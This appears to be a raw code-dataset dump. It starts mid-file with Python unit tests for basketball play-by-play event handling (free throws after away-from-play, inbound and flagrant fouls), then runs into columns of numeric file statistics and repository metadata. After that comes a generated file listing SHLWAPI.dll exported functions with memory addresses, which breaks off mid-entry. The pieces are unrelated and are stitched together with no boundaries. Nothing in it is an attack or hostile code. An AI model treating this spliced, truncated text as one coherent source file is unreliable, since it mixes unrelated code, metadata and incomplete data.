"PLAYER1_ID": 3,
}
order = 1
make_event = StatsFieldGoal(make, order)
ft_event.previous_event = None
ft_event.next_event = foul_event
foul_event.previous_event = ft_event
foul_event.next_event = make_event
make_event.previous_event = foul_event
make_event.next_event = None
assert ft_event.is_away_from_play_ft is True
def test_foul_on_made_ft_by_team_that_didnt_get_fouled_is_away_from_play_ft():
ft_2_of_2 = {
"EVENTNUM": 607,
"PCTIMESTRING": "0:25",
"VISITORDESCRIPTION": "Jackson Free Throw 2 of 2 (16 PTS)",
"EVENTMSGACTIONTYPE": 12,
"EVENTMSGTYPE": 3,
"PLAYER1_ID": 202704,
"PLAYER1_TEAM_ID": 1610612765,
"PLAYER2_ID": None,
"PLAYER2_TEAM_ID": None,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
ft_2_of_2_event = StatsFreeThrow(ft_2_of_2, order)
foul = {
"EVENTNUM": 609,
"PCTIMESTRING": "0:25",
"VISITORDESCRIPTION": "Griffin AWAY.FROM.PLAY.FOUL (P5.PN) (M.Davis)",
"EVENTMSGACTIONTYPE": 6,
"EVENTMSGTYPE": 6,
"PLAYER1_ID": 201933,
"PLAYER1_TEAM_ID": 1610612765,
"PLAYER2_ID": 201145,
"PLAYER2_TEAM_ID": 1610612764,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
foul_event = StatsFoul(foul, order)
ft_1_of_1 = {
"EVENTNUM": 611,
"PCTIMESTRING": "0:25",
"HOMEDESCRIPTION": "Beal Free Throw 1 of 1 (32 PTS)",
"EVENTMSGACTIONTYPE": 10,
"EVENTMSGTYPE": 3,
"PLAYER1_ID": 203078,
"PLAYER1_TEAM_ID": 1610612764,
"PLAYER2_ID": None,
"PLAYER2_TEAM_ID": None,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
ft_1_of_1_event = StatsFreeThrow(ft_1_of_1, order)
fg = {
"EVENTNUM": 612,
"PCTIMESTRING": "0:24",
"VISITORDESCRIPTION": "MISS Green 27' 3PT Jump Shot",
"EVENTMSGACTIONTYPE": 1,
"EVENTMSGTYPE": 2,
"PLAYER1_ID": 201145,
"PLAYER1_TEAM_ID": 1610612764,
"PLAYER2_ID": None,
"PLAYER2_TEAM_ID": None,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
fg_event = StatsFieldGoal(fg, order)
ft_2_of_2_event.previous_event = None
ft_2_of_2_event.next_event = foul_event
foul_event.previous_event = ft_2_of_2_event
foul_event.next_event = ft_1_of_1_event
ft_1_of_1_event.previous_event = foul_event
ft_1_of_1_event.next_event = fg_event
fg_event.previous_event = ft_1_of_1_event
fg_event.next_event = None
assert ft_1_of_1_event.is_away_from_play_ft is True
def test_inbound_foul_ft_true():
foul = {
"EVENTMSGTYPE": 6,
"EVENTMSGACTIONTYPE": 5,
"VISITORDESCRIPTION": "Inbound Foul",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 2,
}
order = 1
foul_event = StatsFoul(foul, order)
ft = {
"EVENTMSGTYPE": 3,
"EVENTMSGACTIONTYPE": 10,
"HOMEDESCRIPTION": "Free Throw 1 of 1",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 1,
}
order = 1
ft_event = StatsFreeThrow(ft, order)
foul_event.previous_event = None
foul_event.next_event = ft_event
ft_event.previous_event = foul_event
ft_event.next_event = None
assert ft_event.is_inbound_foul_ft is True
def test_away_from_play_free_throw_type():
foul = {
"EVENTMSGTYPE": 6,
"EVENTMSGACTIONTYPE": 6,
"VISITORDESCRIPTION": "Away From Play Foul",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 2,
"PLAYER1_ID": 2,
"PLAYER2_ID": 1,
}
order = 1
foul_event = StatsFoul(foul, order)
ft = {
"EVENTMSGTYPE": 3,
"EVENTMSGACTIONTYPE": 10,
"HOMEDESCRIPTION": "Free Throw 1 of 1",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 1,
"PLAYER1_ID": 1,
}
order = 1
ft_event = StatsFreeThrow(ft, order)
make = {
"EVENTMSGTYPE": 1,
"EVENTMSGACTIONTYPE": 10,
"VISITORDESCRIPTION": "Made Shot by team that got fouled",
"PCTIMESTRING": "0:35",
"PLAYER1_TEAM_ID": 1,
"PLAYER1_ID": 21,
}
order = 1
make_event = StatsFieldGoal(make, order)
foul_event.previous_event = None
foul_event.next_event = ft_event
ft_event.previous_event = foul_event
ft_event.next_event = make_event
make_event.previous_event = ft_event
make_event.next_event = None
assert ft_event.free_throw_type == "1 Shot Away From Play"
def test_flagrant_free_throw_type():
foul = {
"EVENTNUM": 609,
"PCTIMESTRING": "0:25",
"VISITORDESCRIPTION": "Griffin Flagrant Foul (P5.PN) (M.Davis)",
"EVENTMSGACTIONTYPE": 14,
"EVENTMSGTYPE": 6,
"PLAYER1_ID": 201933,
"PLAYER1_TEAM_ID": 1610612765,
"PLAYER2_ID": 203078,
"PLAYER2_TEAM_ID": 1610612764,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
foul_event = StatsFoul(foul, order)
ft_1_of_2 = {
"EVENTNUM": 611,
"PCTIMESTRING": "0:25",
"HOMEDESCRIPTION": "Beal Free Throw Flagrant 1 of 2 (32 PTS)",
"EVENTMSGACTIONTYPE": 11,
"EVENTMSGTYPE": 3,
"PLAYER1_ID": 203078,
"PLAYER1_TEAM_ID": 1610612764,
"PLAYER2_ID": None,
"PLAYER2_TEAM_ID": None,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
ft_1_of_2_event = StatsFreeThrow(ft_1_of_2, order)
ft_2_of_2 = {
"EVENTNUM": 611,
"PCTIMESTRING": "0:25",
"HOMEDESCRIPTION": "Beal Free Throw Flagrant 2 of 2 (32 PTS)",
"EVENTMSGACTIONTYPE": 12,
"EVENTMSGTYPE": 3,
"PLAYER1_ID": 203078,
"PLAYER1_TEAM_ID": 1610612764,
"PLAYER2_ID": None,
"PLAYER2_TEAM_ID": None,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
ft_2_of_2_event = StatsFreeThrow(ft_2_of_2, order)
foul_event.previous_event = None
foul_event.next_event = ft_1_of_2_event
ft_1_of_2_event.previous_event = foul_event
ft_1_of_2_event.next_event = ft_2_of_2_event
ft_2_of_2_event.previous_event = ft_1_of_2_event
ft_2_of_2_event.next_event = None
assert ft_1_of_2_event.free_throw_type == "2 Shot Flagrant"
def test_event_for_efficiency_stats_when_events_out_of_order():
ft = {
"EVENTMSGTYPE": 3,
"EVENTMSGACTIONTYPE": 10,
"HOMEDESCRIPTION": "Free Throw 1 of 1",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 1,
"PLAYER1_ID": 1,
}
order = 1
ft_event = StatsFreeThrow(ft, order)
foul = {
"EVENTMSGTYPE": 6,
"EVENTMSGACTIONTYPE": 6,
"VISITORDESCRIPTION": "Away From Play Foul",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 2,
"PLAYER1_ID": 2,
"PLAYER2_ID": 1,
}
order = 1
foul_event = StatsFoul(foul, order)
ft_event.previous_event = None
ft_event.next_event = foul_event
foul_event.previous_event = ft_event
foul_event.next_event = None
assert ft_event.event_for_efficiency_stats == foul_event
| 28.920233
| 80
| 0.597915
| 1,821
| 14,865
| 4.566722
| 0.075233
| 0.039683
| 0.045334
| 0.037037
| 0.898268
| 0.860029
| 0.834295
| 0.794252
| 0.742905
| 0.724266
| 0
| 0.081496
| 0.285974
| 14,865
| 513
| 81
| 28.976608
| 0.701997
| 0
| 0
| 0.76569
| 0
| 0
| 0.292365
| 0
| 0
| 0
| 0
| 0
| 0.033473
| 1
| 0.033473
| false
| 0
| 0.008368
| 0
| 0.041841
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6acacdc50e6b41c12ecf82fe40b41821e7f57e63
| 29,123
|
py
|
Python
|
util/data/gen/SHLWAPI.dll.py
|
56kyle/bloons_auto
|
419d55b51d1cddc49099593970adf1c67985b389
|
[
"MIT"
] | null | null | null |
util/data/gen/SHLWAPI.dll.py
|
56kyle/bloons_auto
|
419d55b51d1cddc49099593970adf1c67985b389
|
[
"MIT"
] | null | null | null |
util/data/gen/SHLWAPI.dll.py
|
56kyle/bloons_auto
|
419d55b51d1cddc49099593970adf1c67985b389
|
[
"MIT"
] | null | null | null |
symbols = []
exports = [{'type': 'function', 'name': 'AssocCreate', 'address': '0x7ffb3e205f90'}, {'type': 'function', 'name': 'AssocGetPerceivedType', 'address': '0x7ffb3e203fc0'}, {'type': 'function', 'name': 'AssocIsDangerous', 'address': '0x7ffb3e216650'}, {'type': 'function', 'name': 'AssocQueryKeyA', 'address': '0x7ffb3e216e20'}, {'type': 'function', 'name': 'AssocQueryKeyW', 'address': '0x7ffb3e205dc0'}, {'type': 'function', 'name': 'AssocQueryStringA', 'address': '0x7ffb3e216f20'}, {'type': 'function', 'name': 'AssocQueryStringByKeyA', 'address': '0x7ffb3e2170d0'}, {'type': 'function', 'name': 'AssocQueryStringByKeyW', 'address': '0x7ffb3e205ea0'}, {'type': 'function', 'name': 'AssocQueryStringW', 'address': '0x7ffb3e205cd0'}, {'type': 'function', 'name': 'ChrCmpIA', 'address': '0x7ffb3e20e910'}, {'type': 'function', 'name': 'ChrCmpIW', 'address': '0x7ffb3e20e930'}, {'type': 'function', 'name': 'ColorAdjustLuma', 'address': '0x7ffb3e219670'}, {'type': 'function', 'name': 'ColorHLSToRGB', 'address': '0x7ffb3e2092d0'}, {'type': 'function', 'name': 'ColorRGBToHLS', 'address': '0x7ffb3e2090e0'}, {'type': 'function', 'name': 'ConnectToConnectionPoint', 'address': '0x7ffb3e2076c0'}, {'type': 'function', 'name': 'DelayLoadFailureHook', 'address': '0x7ffb3e2197b0'}, {'type': 'function', 'name': 'DllGetClassObject', 'address': '0x7ffb3e21ff70'}, {'type': 'function', 'name': 'DllGetVersion', 'address': '0x7ffb3e21fea0'}, {'type': 'function', 'name': 'GetAcceptLanguagesA', 'address': '0x7ffb3e20e950'}, {'type': 'function', 'name': 'GetAcceptLanguagesW', 'address': '0x7ffb3e20e970'}, {'type': 'function', 'name': 'GetMenuPosFromID', 'address': '0x7ffb3e206e50'}, {'type': 'function', 'name': 'HashData', 'address': '0x7ffb3e20e990'}, {'type': 'function', 'name': 'IStream_Copy', 'address': '0x7ffb3e212040'}, {'type': 'function', 'name': 'IStream_Read', 'address': '0x7ffb3e212060'}, {'type': 'function', 'name': 'IStream_ReadPidl', 'address': '0x7ffb3e206ce0'}, {'type': 'function', 'name': 'IStream_ReadStr', 'address': '0x7ffb3e2017c0'}, {'type': 'function', 'name': 'IStream_Reset', 'address': '0x7ffb3e212080'}, {'type': 'function', 'name': 'IStream_Size', 'address': '0x7ffb3e2120a0'}, {'type': 'function', 'name': 'IStream_Write', 'address': '0x7ffb3e2120e0'}, {'type': 'function', 'name': 'IStream_WritePidl', 'address': '0x7ffb3e209dc0'}, {'type': 'function', 'name': 'IStream_WriteStr', 'address': '0x7ffb3e2120c0'}, {'type': 'function', 'name': 'IUnknown_AtomicRelease', 'address': '0x7ffb3e212100'}, {'type': 'function', 'name': 'IUnknown_Exec', 'address': '0x7ffb3e208150'}, {'type': 'function', 'name': 'IUnknown_GetSite', 'address': '0x7ffb3e212120'}, {'type': 'function', 'name': 'IUnknown_GetWindow', 'address': '0x7ffb3e206940'}, {'type': 'function', 'name': 'IUnknown_QueryService', 'address': '0x7ffb3e209ef0'}, {'type': 'function', 'name': 'IUnknown_QueryStatus', 'address': '0x7ffb3e21c1f0'}, {'type': 'function', 'name': 'IUnknown_Set', 'address': '0x7ffb3e207260'}, {'type': 'function', 'name': 'IUnknown_SetSite', 'address': '0x7ffb3e201a10'}, {'type': 'function', 'name': 'IntlStrEqWorkerA', 'address': '0x7ffb3e20f770'}, {'type': 'function', 'name': 'IntlStrEqWorkerW', 'address': '0x7ffb3e20f790'}, {'type': 'function', 'name': 'IsCharSpaceA', 'address': '0x7ffb3e20ea30'}, {'type': 'function', 'name': 'IsCharSpaceW', 'address': '0x7ffb3e201490'}, {'type': 'function', 'name': 'IsInternetESCEnabled', 'address': '0x7ffb3e20ea70'}, {'type': 'function', 'name': 'IsOS', 'address': '0x7ffb3e208110'}, {'type': 'function', 'name': 'MLLoadLibraryA', 'address': '0x7ffb3e21c5d0'}, {'type': 'function', 'name': 'MLLoadLibraryW', 'address': '0x7ffb3e21c5f0'}, {'type': 'function', 'name': 'ParseURLA', 'address': '0x7ffb3e20ea90'}, {'type': 'function', 'name': 'ParseURLW', 'address': '0x7ffb3e209590'}, {'type': 'function', 'name': 'PathAddBackslashA', 'address': '0x7ffb3e2096c0'}, {'type': 'function', 'name': 'PathAddBackslashW', 'address': '0x7ffb3e208050'}, {'type': 'function', 'name': 'PathAddExtensionA', 'address': '0x7ffb3e20eab0'}, {'type': 'function', 'name': 'PathAddExtensionW', 'address': '0x7ffb3e20ead0'}, {'type': 'function', 'name': 'PathAppendA', 'address': '0x7ffb3e20eaf0'}, {'type': 'function', 'name': 'PathAppendW', 'address': '0x7ffb3e20eb10'}, {'type': 'function', 'name': 'PathBuildRootA', 'address': '0x7ffb3e212140'}, {'type': 'function', 'name': 'PathBuildRootW', 'address': '0x7ffb3e2019d0'}, {'type': 'function', 'name': 'PathCanonicalizeA', 'address': '0x7ffb3e20eb30'}, {'type': 'function', 'name': 'PathCanonicalizeW', 'address': '0x7ffb3e20eb50'}, {'type': 'function', 'name': 'PathCombineA', 'address': '0x7ffb3e20eb70'}, {'type': 'function', 'name': 'PathCombineW', 'address': '0x7ffb3e201990'}, {'type': 'function', 'name': 'PathCommonPrefixA', 'address': '0x7ffb3e20eb90'}, {'type': 'function', 'name': 'PathCommonPrefixW', 'address': '0x7ffb3e207a80'}, {'type': 'function', 'name': 'PathCompactPathA', 'address': '0x7ffb3e2130e0'}, {'type': 'function', 'name': 'PathCompactPathExA', 'address': '0x7ffb3e213470'}, {'type': 'function', 'name': 'PathCompactPathExW', 'address': '0x7ffb3e2025f0'}, {'type': 'function', 'name': 'PathCompactPathW', 'address': '0x7ffb3e217ab0'}, {'type': 'function', 'name': 'PathCreateFromUrlA', 'address': '0x7ffb3e20ebb0'}, {'type': 'function', 'name': 'PathCreateFromUrlAlloc', 'address': '0x7ffb3e20ebd0'}, {'type': 'function', 'name': 'PathCreateFromUrlW', 'address': '0x7ffb3e207990'}, {'type': 'function', 'name': 'PathFileExistsA', 'address': '0x7ffb3e209ed0'}, {'type': 'function', 'name': 'PathFileExistsAndAttributesW', 'address': '0x7ffb3e2020d0'}, {'type': 'function', 'name': 'PathFileExistsW', 'address': '0x7ffb3e209e50'}, {'type': 'function', 'name': 'PathFindExtensionA', 'address': '0x7ffb3e20ebf0'}, {'type': 'function', 'name': 'PathFindExtensionW', 'address': '0x7ffb3e206e10'}, {'type': 'function', 'name': 'PathFindFileNameA', 'address': '0x7ffb3e2017a0'}, {'type': 'function', 'name': 'PathFindFileNameW', 'address': '0x7ffb3e206fe0'}, {'type': 'function', 'name': 'PathFindNextComponentA', 'address': '0x7ffb3e20ec10'}, {'type': 'function', 'name': 'PathFindNextComponentW', 'address': '0x7ffb3e2095f0'}, {'type': 'function', 'name': 'PathFindOnPathA', 'address': '0x7ffb3e2138c0'}, {'type': 'function', 'name': 'PathFindOnPathW', 'address': '0x7ffb3e201c70'}, {'type': 'function', 'name': 'PathFindSuffixArrayA', 'address': '0x7ffb3e213b70'}, {'type': 'function', 'name': 'PathFindSuffixArrayW', 'address': '0x7ffb3e206f10'}, {'type': 'function', 'name': 'PathGetArgsA', 'address': '0x7ffb3e20ec30'}, {'type': 'function', 'name': 'PathGetArgsW', 'address': '0x7ffb3e2080b0'}, {'type': 'function', 'name': 'PathGetCharTypeA', 'address': '0x7ffb3e20ec50'}, {'type': 'function', 'name': 'PathGetCharTypeW', 'address': '0x7ffb3e2084b0'}, {'type': 'function', 'name': 'PathGetDriveNumberA', 'address': '0x7ffb3e20ec70'}, {'type': 'function', 'name': 'PathGetDriveNumberW', 'address': '0x7ffb3e208010'}, {'type': 'function', 'name': 'PathIsContentTypeA', 'address': '0x7ffb3e213c70'}, {'type': 'function', 'name': 'PathIsContentTypeW', 'address': '0x7ffb3e217e50'}, {'type': 'function', 'name': 'PathIsDirectoryA', 'address': '0x7ffb3e213d30'}, {'type': 'function', 'name': 'PathIsDirectoryEmptyA', 'address': '0x7ffb3e213e50'}, {'type': 'function', 'name': 'PathIsDirectoryEmptyW', 'address': '0x7ffb3e217f10'}, {'type': 'function', 'name': 'PathIsDirectoryW', 'address': '0x7ffb3e207890'}, {'type': 'function', 'name': 'PathIsFileSpecA', 'address': '0x7ffb3e20ec90'}, {'type': 'function', 'name': 'PathIsFileSpecW', 'address': '0x7ffb3e20ecb0'}, {'type': 'function', 'name': 'PathIsLFNFileSpecA', 'address': '0x7ffb3e20ecd0'}, {'type': 'function', 'name': 'PathIsLFNFileSpecW', 'address': '0x7ffb3e20ecf0'}, {'type': 'function', 'name': 'PathIsNetworkPathA', 'address': '0x7ffb3e212160'}, {'type': 'function', 'name': 'PathIsNetworkPathW', 'address': '0x7ffb3e207d90'}, {'type': 'function', 'name': 'PathIsPrefixA', 'address': '0x7ffb3e20ed10'}, {'type': 'function', 'name': 'PathIsPrefixW', 'address': '0x7ffb3e207df0'}, {'type': 'function', 'name': 'PathIsRelativeA', 'address': '0x7ffb3e20ed30'}, {'type': 'function', 'name': 'PathIsRelativeW', 'address': '0x7ffb3e207f40'}, {'type': 'function', 'name': 'PathIsRootA', 'address': '0x7ffb3e20ed50'}, {'type': 'function', 'name': 'PathIsRootW', 'address': '0x7ffb3e209610'}, {'type': 'function', 'name': 'PathIsSameRootA', 'address': '0x7ffb3e20ed70'}, {'type': 'function', 'name': 'PathIsSameRootW', 'address': '0x7ffb3e20ed90'}, {'type': 'function', 'name': 'PathIsSystemFolderA', 'address': '0x7ffb3e213f40'}, {'type': 'function', 'name': 'PathIsSystemFolderW', 'address': '0x7ffb3e204550'}, {'type': 'function', 'name': 'PathIsUNCA', 'address': '0x7ffb3e20edb0'}, {'type': 'function', 'name': 'PathIsUNCServerA', 'address': '0x7ffb3e20edd0'}, {'type': 'function', 'name': 'PathIsUNCServerShareA', 'address': '0x7ffb3e20edf0'}, {'type': 'function', 'name': 'PathIsUNCServerShareW', 'address': '0x7ffb3e20ee10'}, {'type': 'function', 'name': 'PathIsUNCServerW', 'address': '0x7ffb3e20ee30'}, {'type': 'function', 'name': 'PathIsUNCW', 'address': '0x7ffb3e207d70'}, {'type': 'function', 'name': 'PathIsURLA', 'address': '0x7ffb3e20ee50'}, {'type': 'function', 'name': 'PathIsURLW', 'address': '0x7ffb3e207240'}, {'type': 'function', 'name': 'PathMakePrettyA', 'address': '0x7ffb3e214040'}, {'type': 'function', 'name': 'PathMakePrettyW', 'address': '0x7ffb3e2180d0'}, {'type': 'function', 'name': 'PathMakeSystemFolderA', 'address': '0x7ffb3e2140c0'}, {'type': 'function', 'name': 'PathMakeSystemFolderW', 'address': '0x7ffb3e2014b0'}, {'type': 'function', 'name': 'PathMatchSpecA', 'address': '0x7ffb3e20ee90'}, {'type': 'function', 'name': 'PathMatchSpecExA', 'address': '0x7ffb3e20eeb0'}, {'type': 'function', 'name': 'PathMatchSpecExW', 'address': '0x7ffb3e20eed0'}, {'type': 'function', 'name': 'PathMatchSpecW', 'address': '0x7ffb3e20eef0'}, {'type': 'function', 'name': 'PathParseIconLocationA', 'address': '0x7ffb3e20ef10'}, {'type': 'function', 'name': 'PathParseIconLocationW', 'address': '0x7ffb3e207db0'}, {'type': 'function', 'name': 'PathQuoteSpacesA', 'address': '0x7ffb3e20ef30'}, {'type': 'function', 'name': 'PathQuoteSpacesW', 'address': '0x7ffb3e20ef50'}, {'type': 'function', 'name': 'PathRelativePathToA', 'address': '0x7ffb3e20ef70'}, {'type': 'function', 'name': 'PathRelativePathToW', 'address': '0x7ffb3e20ef90'}, {'type': 'function', 'name': 'PathRemoveArgsA', 'address': '0x7ffb3e214280'}, {'type': 'function', 'name': 'PathRemoveArgsW', 'address': '0x7ffb3e2071f0'}, {'type': 'function', 'name': 'PathRemoveBackslashA', 'address': '0x7ffb3e20efb0'}, {'type': 'function', 'name': 'PathRemoveBackslashW', 'address': '0x7ffb3e207930'}, {'type': 'function', 'name': 'PathRemoveBlanksA', 'address': '0x7ffb3e20efd0'}, {'type': 'function', 'name': 'PathRemoveBlanksW', 'address': '0x7ffb3e208070'}, {'type': 'function', 'name': 'PathRemoveExtensionA', 'address': '0x7ffb3e20eff0'}, {'type': 'function', 'name': 'PathRemoveExtensionW', 'address': '0x7ffb3e208090'}, {'type': 'function', 'name': 'PathRemoveFileSpecA', 'address': '0x7ffb3e20f010'}, {'type': 'function', 'name': 'PathRemoveFileSpecW', 'address': '0x7ffb3e207950'}, {'type': 'function', 'name': 'PathRenameExtensionA', 'address': '0x7ffb3e20f030'}, {'type': 'function', 'name': 'PathRenameExtensionW', 'address': '0x7ffb3e20f050'}, {'type': 'function', 'name': 'PathSearchAndQualifyA', 'address': '0x7ffb3e20f070'}, {'type': 'function', 'name': 'PathSearchAndQualifyW', 'address': '0x7ffb3e20f090'}, {'type': 'function', 'name': 'PathSetDlgItemPathA', 'address': '0x7ffb3e2142c0'}, {'type': 'function', 'name': 'PathSetDlgItemPathW', 'address': '0x7ffb3e218130'}, {'type': 'function', 'name': 'PathSkipRootA', 'address': '0x7ffb3e20f0b0'}, {'type': 'function', 'name': 'PathSkipRootW', 'address': '0x7ffb3e2096a0'}, {'type': 'function', 'name': 'PathStripPathA', 'address': '0x7ffb3e20f0d0'}, {'type': 'function', 'name': 'PathStripPathW', 'address': '0x7ffb3e2019f0'}, {'type': 'function', 'name': 'PathStripToRootA', 'address': '0x7ffb3e20f0f0'}, {'type': 'function', 'name': 'PathStripToRootW', 'address': '0x7ffb3e2095b0'}, {'type': 'function', 'name': 'PathUnExpandEnvStringsA', 'address': '0x7ffb3e20f110'}, {'type': 'function', 'name': 'PathUnExpandEnvStringsW', 'address': '0x7ffb3e20f130'}, {'type': 'function', 'name': 'PathUndecorateA', 'address': '0x7ffb3e214450'}, {'type': 'function', 'name': 'PathUndecorateW', 'address': '0x7ffb3e208e80'}, {'type': 'function', 'name': 'PathUnmakeSystemFolderA', 'address': '0x7ffb3e214540'}, {'type': 'function', 'name': 'PathUnmakeSystemFolderW', 'address': '0x7ffb3e2182d0'}, {'type': 'function', 'name': 'PathUnquoteSpacesA', 'address': '0x7ffb3e20f150'}, {'type': 'function', 'name': 'PathUnquoteSpacesW', 'address': '0x7ffb3e209b20'}, {'type': 'function', 'name': 'QISearch', 'address': '0x7ffb3e206260'}, {'type': 'function', 'name': 'SHAllocShared', 'address': '0x7ffb3e220600'}, {'type': 'function', 'name': 'SHAnsiToAnsi', 'address': '0x7ffb3e212180'}, {'type': 'function', 'name': 'SHAnsiToUnicode', 'address': '0x7ffb3e2121a0'}, {'type': 'function', 'name': 'SHAutoComplete', 'address': '0x7ffb3e21c760'}, {'type': 'function', 'name': 'SHCopyKeyA', 'address': '0x7ffb3e2121c0'}, {'type': 'function', 'name': 'SHCopyKeyW', 'address': '0x7ffb3e2121e0'}, {'type': 'function', 'name': 'SHCreateMemStream', 'address': '0x7ffb3e207dd0'}, {'type': 'function', 'name': 'SHCreateShellPalette', 'address': '0x7ffb3e207c40'}, {'type': 'function', 'name': 'SHCreateStreamOnFileA', 'address': '0x7ffb3e212200'}, {'type': 'function', 'name': 'SHCreateStreamOnFileEx', 'address': '0x7ffb3e212220'}, {'type': 'function', 'name': 'SHCreateStreamOnFileW', 'address': '0x7ffb3e212240'}, {'type': 'function', 'name': 'SHCreateThread', 'address': '0x7ffb3e2080f0'}, {'type': 'function', 'name': 'SHCreateThreadRef', 'address': '0x7ffb3e212260'}, {'type': 'function', 'name': 'SHCreateThreadWithHandle', 'address': '0x7ffb3e209e70'}, {'type': 'function', 'name': 'SHCreateWorkerWindowW', 'address': '0x7ffb3e209a70'}, {'type': 'function', 'name': 'SHDeleteEmptyKeyA', 'address': '0x7ffb3e212280'}, {'type': 'function', 'name': 'SHDeleteEmptyKeyW', 'address': '0x7ffb3e2122a0'}, {'type': 'function', 'name': 'SHDeleteKeyA', 'address': '0x7ffb3e2122c0'}, {'type': 'function', 'name': 'SHDeleteKeyW', 'address': '0x7ffb3e2122e0'}, {'type': 'function', 'name': 'SHDeleteValueA', 'address': '0x7ffb3e212300'}, {'type': 'function', 'name': 'SHDeleteValueW', 'address': '0x7ffb3e212320'}, {'type': 'function', 'name': 'SHEnumKeyExA', 'address': '0x7ffb3e212340'}, {'type': 'function', 'name': 'SHEnumKeyExW', 'address': '0x7ffb3e212360'}, {'type': 'function', 'name': 'SHEnumValueA', 'address': '0x7ffb3e212380'}, {'type': 'function', 'name': 'SHEnumValueW', 'address': '0x7ffb3e2123a0'}, {'type': 'function', 'name': 'SHFormatDateTimeA', 'address': '0x7ffb3e218a70'}, {'type': 'function', 'name': 'SHFormatDateTimeW', 'address': '0x7ffb3e218af0'}, {'type': 'function', 'name': 'SHFreeShared', 'address': '0x7ffb3e220620'}, {'type': 'function', 'name': 'SHGetInverseCMAP', 'address': '0x7ffb3e219ea0'}, {'type': 'function', 'name': 'SHGetThreadRef', 'address': '0x7ffb3e2123c0'}, {'type': 'function', 'name': 'SHGetValueA', 'address': '0x7ffb3e2123e0'}, {'type': 'function', 'name': 'SHGetValueW', 'address': '0x7ffb3e207e10'}, {'type': 'function', 'name': 'SHGetViewStatePropertyBag', 'address': '0x7ffb3e204590'}, {'type': 'function', 'name': 'SHIsChildOrSelf', 'address': '0x7ffb3e2065a0'}, {'type': 'function', 'name': 'SHIsLowMemoryMachine', 'address': '0x7ffb3e208330'}, {'type': 'function', 'name': 'SHLoadIndirectString', 'address': '0x7ffb3e2080d0'}, {'type': 'function', 'name': 'SHLockShared', 'address': '0x7ffb3e220680'}, {'type': 'function', 'name': 'SHMessageBoxCheckA', 'address': '0x7ffb3e21cf60'}, {'type': 'function', 'name': 'SHMessageBoxCheckW', 'address': '0x7ffb3e21d300'}, {'type': 'function', 'name': 'SHOpenRegStream2A', 'address': '0x7ffb3e212400'}, {'type': 'function', 'name': 'SHOpenRegStream2W', 'address': '0x7ffb3e212420'}, {'type': 'function', 'name': 'SHOpenRegStreamA', 'address': '0x7ffb3e212440'}, {'type': 'function', 'name': 'SHOpenRegStreamW', 'address': '0x7ffb3e212460'}, {'type': 'function', 'name': 'SHPackDispParamsV', 'address': '0x7ffb3e208d80'}, {'type': 'function', 'name': 'SHPinDllOfCLSID', 'address': '0x7ffb3e2022d0'}, {'type': 'function', 'name': 'SHPropertyBag_ReadStrAlloc', 'address': '0x7ffb3e221d30'}, {'type': 'function', 'name': 'SHPropertyBag_WriteBSTR', 'address': '0x7ffb3e221df0'}, {'type': 'function', 'name': 'SHQueryInfoKeyA', 'address': '0x7ffb3e212480'}, {'type': 'function', 'name': 'SHQueryInfoKeyW', 'address': '0x7ffb3e2124a0'}, {'type': 'function', 'name': 'SHQueryValueExA', 'address': '0x7ffb3e2124c0'}, {'type': 'function', 'name': 'SHQueryValueExW', 'address': '0x7ffb3e2124e0'}, {'type': 'function', 'name': 'SHRegCloseUSKey', 'address': '0x7ffb3e20f190'}, {'type': 'function', 'name': 'SHRegCreateUSKeyA', 'address': '0x7ffb3e20f1b0'}, {'type': 'function', 'name': 'SHRegCreateUSKeyW', 'address': '0x7ffb3e20f1d0'}, {'type': 'function', 'name': 'SHRegDeleteEmptyUSKeyA', 'address': '0x7ffb3e20f1f0'}, {'type': 'function', 'name': 'SHRegDeleteEmptyUSKeyW', 'address': '0x7ffb3e20f210'}, {'type': 'function', 'name': 'SHRegDeleteUSValueA', 'address': '0x7ffb3e20f230'}, {'type': 'function', 'name': 'SHRegDeleteUSValueW', 'address': '0x7ffb3e20f250'}, {'type': 'function', 'name': 'SHRegDuplicateHKey', 'address': '0x7ffb3e212500'}, {'type': 'function', 'name': 'SHRegEnumUSKeyA', 'address': '0x7ffb3e20f270'}, {'type': 'function', 'name': 'SHRegEnumUSKeyW', 'address': '0x7ffb3e20f290'}, {'type': 'function', 'name': 'SHRegEnumUSValueA', 'address': '0x7ffb3e20f2b0'}, {'type': 'function', 'name': 'SHRegEnumUSValueW', 'address': '0x7ffb3e20f2d0'}, {'type': 'function', 'name': 'SHRegGetBoolUSValueA', 'address': '0x7ffb3e20f2f0'}, {'type': 'function', 'name': 'SHRegGetBoolUSValueW', 'address': '0x7ffb3e2095d0'}, {'type': 'function', 'name': 'SHRegGetBoolValueFromHKCUHKLM', 'address': '0x7ffb3e20b960'}, {'type': 'function', 'name': 'SHRegGetIntW', 'address': '0x7ffb3e212520'}, {'type': 'function', 'name': 'SHRegGetPathA', 'address': '0x7ffb3e212540'}, {'type': 'function', 'name': 'SHRegGetPathW', 'address': '0x7ffb3e212560'}, {'type': 'function', 'name': 'SHRegGetUSValueA', 'address': '0x7ffb3e20f310'}, {'type': 'function', 'name': 'SHRegGetUSValueW', 'address': '0x7ffb3e20f330'}, {'type': 'function', 'name': 'SHRegGetValueA', 'address': '0x7ffb3e212580'}, {'type': 'function', 'name': 'SHRegGetValueFromHKCUHKLM', 'address': '0x7ffb3e20b060'}, {'type': 'function', 'name': 'SHRegGetValueW', 'address': 